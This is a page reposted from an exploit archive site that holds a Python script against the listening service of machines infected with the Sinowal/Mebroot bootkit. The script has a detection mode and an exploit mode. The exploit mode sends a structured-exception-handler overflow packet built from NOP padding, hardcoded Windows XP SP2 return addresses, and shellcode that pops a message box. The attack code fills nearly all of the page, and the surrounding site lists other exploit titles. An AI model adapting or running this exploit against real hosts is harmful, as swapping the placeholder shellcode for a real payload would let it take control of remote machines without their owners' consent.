首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sinowal/Mebroot Bootkit Password Stealing Exploit
来源:vfocus.net 作者:vfocus 发布时间:2011-01-14  
#!/usr/bin/env python

import sys
from socket import *

xpsp2_ret = "\xe5\x38\xC8\x74" # 0x74C838E5 OLEACC
short_jmp = "\xEB\xD3\x90\x90"


detection_packet = "x" * 10
beepshellcode = "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" \
"\x77\x7A\x83\x7C" \
"\xC7\x44\x24\x04" \
"\xD0\x03" \
"\x00\x00\xC7\x04\x24" \
"\x01\x0E" \
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3" 

msg = "infected with sinowal!"

msgboxshellcode = "\x6A\x00\x6A\x00\xE8" + chr(len(msg)+1) + "\x00\x00\x00" + msg + "\x00\x6A\x00\xE8" + "\xAE\x05\x09\x7E"

seh_ret = xpsp2_ret


exploit_packet = "\x20\x20\x2F\x2F\x3A" + \
                 (0x44 - len(msgboxshellcode)) * "\x90" + \
                 msgboxshellcode + \
                 short_jmp + \
                 seh_ret + \
                 "\x2F"


"""
exploit_packet = "\x20\x20\x2F\x2F\x3A" + \
                 0x44 * "\x90" + \
                 short_jmp + \
                 seh_ret + \
                 shellcode + \
                 "\x2F"
"""


if (len(sys.argv) < 4) or ("-e" not in sys.argv and "-d" not in sys.argv):
  print "seenowall.py <ip> <tcp port> <mode>"
  print "modes:\n" \
  "  -d (detect)\n" \
  "  -e (exploit)\n"
  sys.exit(0)

s = socket(AF_INET, SOCK_STREAM)

print "[*] connecting"

try:
  s.connect((sys.argv[1], int(sys.argv[2])))
except:
  print "[!] connection error"
  s.close()
  sys.exit(0)


if "-e" in sys.argv:
  print "[*] sending exploit"
  s.send(exploit_packet)
else:
  print "[*] sending detection packet"
  s.send(detection_packet)
  reply = s.recv(1024)
  if reply != "<h1>ERROR IN REQUEST<br>":
    print "[*] sinowal not listening on this port"
    s.close()
    sys.exit(0)
  print "[*] remote box is infected (and possibly vulnerable)"

s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS11-002: Microsoft Data Acces
·Nokia Multimedia Player 1.0 SE
·MS10-073: Win32k Keyboard Layo
·Mono/Moonlight Generic Type Ar
·SiteScape Enterprise Forum 7 T
·ProFTPD 1.2 - 1.3.0 sreplace B
·Objectivity/DB Lack of Authent
·Solar FTP Server 2.1 Buffer Ov
·VMWare Denial Of Service / Pri
·DriveCrypt <= 5.3 local kernel
·Blackmoon FTP 3.1 Denial Of Se
·DriveCrypt <= 5.3 local kernel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved